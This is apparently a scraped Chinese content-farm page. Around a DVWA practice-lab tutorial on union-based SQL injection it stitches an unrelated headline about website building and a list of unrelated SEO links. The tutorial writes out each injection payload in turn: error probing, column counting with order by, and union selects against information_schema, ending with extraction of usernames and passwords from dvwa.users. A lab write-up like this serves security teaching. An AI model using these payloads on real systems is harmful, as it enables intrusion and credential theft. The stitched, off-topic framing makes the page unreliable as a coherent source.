当前位置: 首页 > news >正文

网站建设需要自备什么聊城手机站网站公司

网站建设需要自备什么,聊城手机站网站公司,智联人才招聘网,wordpress深度优化主题本次注入的是DVWA靶场的SQL injection 1.判断是字符型注入还是数字型注入,构造SQL语句 1 and 12 由此可以判断出为字符型注入 2.考虑闭合方式,先随便丢一个单引号试试看看报错提示 You have an error in your SQL syntax; check the manual that cor…

本次注入的是DVWA靶场的SQL injection

1.判断是字符型注入还是数字型注入,构造SQL语句

1 and 1=2

由此可以判断出为字符型注入

2.考虑闭合方式,先随便丢一个单引号试试看看报错提示

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1

根据报错提示可以看出是引号进行包括的值

3.判断输出的列数,使用order by函数与二分法

可以判断出列数为2

4.联合查询,尝试查看内容回显的地方

构造SQL语句 -1' union select 1,2 #

可以看到回显内容的地方是First name与Surname

查询出数据库 -1' union select 1,database() #

查询出数据表-1' union select 1,group_concat(hex(table_name)) from information_schema.tables where table_schema='dvwa' #

得到两个值去hex解码分别是 guestbook,users这两个也是DVWA数据库下面的所有表名,根据表的名字就可以判断出账号与密码存储在了users这个表里面,所以我们要对这个表进行查询,查询这个表里面的所有字段,开始构造SQL语句

-1' union select 1,group_concat(hex(column_name)) from information_schema.columns where table_schema='dvwa' and table_name='users' #

得到了表下面的所有字段内容

对这些内容分别进行解码,将要查询的字段提取出来,分别是user与password,再次构造SQL语句对这两个字段的内容进行查询

-1' union select 1,group_concat(user,'-',password) from dvwa.users #

成功注入出账号与密码。

http://www.yayakq.cn/news/919254/

相关文章:

  • 茄子河区网站建设自查报告浏览器主页被篡改2345
  • 禅城区建网站公司系统重装后怎么装wordpress
  • org是国外的网站吗北京好的医疗网站设计
  • 化妆品商城网站方案珠海市今天刚刚发生的新闻
  • 做英文企业网站创建网站运营费用
  • 品牌网站建设策wordpress 不同分类不同模板
  • 建网站选服务器wordpress linux 静态
  • 店铺外卖网站怎么做网站关键词优化到首页后怎么做
  • 海珠定制型网站建设泰安公司网站建设
  • 网站设计用处wordpress构建android
  • 白云区做网站怎么做交易平台网站
  • 手机电视直播网站大全浏览器直接进入网站的注意事项
  • 漳州网站建设公司首选重庆seo网站排名优化
  • 大学生做网站的流程建网站网络公司
  • 贵州网站制作公司网站平台由什么搭建
  • 广东网站设计品牌设计景点网站怎么做
  • 网站开发从何学起淄博网站文章优化
  • 做网站的去哪找客户广告创意设计公司
  • 旅游网站网页设计高质量网站外链平台
  • 公司网站如何建立商标注册证电子版查询
  • 深圳网站小程序设计开发宜春市住房和城乡建设局网站
  • 北京市建设工程信息网招标seo科技网
  • flash网站片头动画建站公司上海
  • 设计网站推荐模型外包网站
  • 潜江做网站短剧小程序开发费用
  • 淘客网站建设视频兰陵住房建设局网站
  • dz网站模板公司内部网络怎么建立
  • python可以做网站前端怎么找网站建设
  • 网站备案最快怎么做各个地图网站的认证
  • 澎湃动力网站建设公司开封网站建设兼职